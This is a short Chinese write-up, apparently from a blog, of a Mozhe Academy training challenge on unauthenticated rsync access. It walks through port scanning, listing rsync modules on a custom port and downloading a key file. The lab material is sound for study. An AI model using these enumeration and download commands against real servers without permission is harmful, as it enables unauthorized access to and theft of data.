墨者学院-rsync未授权访问漏洞利用
作者:互联网
rsync未授权访问漏洞利用
难易程度:★★
题目类型:配置错误
使用工具:kali
1.首先了解一下rsync是什么,rsync是linux系统下的数据镜像备份工具。使用快速增量备份工具Remote Sync可以远程同步,支持本地复制,或者与其他SSH、rsync主机同步。
2.打开kali,先用nmap扫一下端口,rsync默认端口为873。发现端口给过滤了,扫不出端口。
应该是改了端口为题目提供的48629。
3.如果是默认端口,命令为rsync ip::
因为改了端口,所以这里输入rsync --port=端口号 ip::
该命令为查看服务器目录。
4.得到volume目录
输入rsync --port=端口号 ip::volume 查看服务器目录下的文件。
得到key_12016922131956.php
5.把key文件下载到tmp目录下
输入rsync --port=端口号 ip::volume/key_12016922131956.php /tmp
6.进入tmp目录,查看key文件,得到key。
标签:rsync,ip,端口,漏洞,key,目录,端口号,墨者 来源: https://blog.csdn.net/weixin_39998158/article/details/100548114